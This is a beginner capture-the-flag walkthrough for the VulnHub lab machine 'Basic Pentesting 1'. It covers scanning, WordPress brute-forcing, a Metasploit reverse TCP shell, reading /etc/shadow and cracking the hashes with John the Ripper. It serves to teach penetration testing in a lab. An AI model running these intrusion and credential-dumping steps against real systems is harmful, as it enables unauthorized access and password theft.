VulnHub Walkthrough’s : BOX 1

CTF Image ( commonly found image so nothing new, why don’t you scroll and read 😉)

Dear Hackers,
This is the first box of my vulnhub CTF series , I hereby explain the tools, methodologies and logics used to own the root for each box.

1. Box Name — Basic Pentesting 1

Description : An easy beginner level box

Download Link — https://www.vulnhub.com/entry/basic-pentesting-1,216/

Setting Up :
1. Make sure, you turn on the OS and also set the network card corresponding to the one running in the kali Machine i.e Bridged network or NAT.

2. Make a note of your IP address , using ifconfig

Step 1: Discovering the IP address of the target machine

This is the common step for all your hacking targets. Once a host is discovered we can find the services and open ports of the target machine. Two Methods to discover hosts :
1. Nmap
2. Netdiscover Tool

i) Nmap :
nmap , Initiating Nmap tool.
-sn , This flag is called as the “Ping Scan” which discovers only the hosts and does not do a direct port scan which makes it a good option for host discovery.
your_ip_address, Your subnet IP address ; eg: 10.0.0.0/24

ii) Netdiscover Tool:
Syntax — netdiscover -r 192.168.0.0/24
Installation — apt-get install netdiscover
netdiscover, Initiating Netdiscover Tool
-r, scanning the local network
your_ip_address, Your subnet IP address ; eg: 10.0.0.0/24

Step 2 : Discovering the Services running on the Target

First, We need to scan for the ports and services and OS running over the target machine. The Best method is using “Nmap” tool.
There are other Scans such as to evade Anti-Virus, creating fragmented packets..etc yet these are not needed for this box. (That will be a story for another day 😎)
-sV, Version Scanning ; It scans the services running on the ports
-T4 , Makes the Scan faster
-p- , scans all ports . (By Default, nmap only scans 1000 ports )
-v, extra verbose, Providing detailed output

Second, if there is port 80 open , type the target IP in a browser and inspect the website.

Step 3 : Discovering Web Service and Directories

1. Using nikto to know about the layers of the webserver i.e In this box, you can find the usage of wordpress and other web technologies. Nikto scan discovers directory /secret. Try target_ip_addr/secret in the browser.

2. using dirb to find sub directories and other hidden directories.

Step 4 : Adding hosts and doing a wpscan ( Since it has a wordpress enabled)

1. Adding hosts
   To add hosts,
   echo “ip_addr name_of_host” >> /etc/hosts
   (if you are not able to find the host name of the target see the URL bar of the target ip address pasted in the browser)

2. wpscan over a wordpress site to enumerate user names and password
where ,
-u , url name
- -wordlists, to parse for a bruteforce attack
- -threads 2, for faster execution

Step 5 : Finding Exploits

Finding Exploits is a trick one but there are tools like searchsploit and msfconsole to search for payloads. There are other sources like exploit-db which ill cover in future posts.
1. Using searchsploit

2. Using msfconsole ( Check below )

Step 6 : Exploiting using Metasploit

Steps in msfconsole to exploit , ( These are the common steps for metasploit )
1. search the payload
2. using “use” command choose the desired exploit.(NOTE : always go for the “excellent” rank , which provides higher chance of exploiting).
3. type “show options” to set the parameters like target_host ip address, target port.
4. Now, we need to set payload i.e invoking a shell prompt in the target machine and setting the reverse connection to the localhost by setting LHOST.(NOTE : a reverse TCP shell works most of the time)
5. All done, exploit
6. This step changes from OS to OS, so we need to take shell accordingly, in linux the password will be located under /etc/shadow, In windows the password will be in SAM
type- cat etc/shadow

Step 7 : Password Cracking

Password cracking can be done by many tools like cain & abel, john the ripper, hashcat..etc
Here we shall use JohntheRipper using “john” command
1. save the hash in a txt file.
2. To crack , type john txt_filename
3. To show the cracked password, type john — — show txt_filename.

Summary :

In a nutshell,
* Host discovery — netdiscover, nmap
* Scanning — nmap
* Discovering web services — dirb, nikto
* Wordpress scan — wpscan
* Finding exploits — Searchsploit, msfconsole
* Exploiting — Metasploit/msfconsole
* Password Cracking — John (JohnTheRipper)

Yeah that’s it for this box, In next post I shall describe even more in-depth methodologies. Happy Hacking 😍.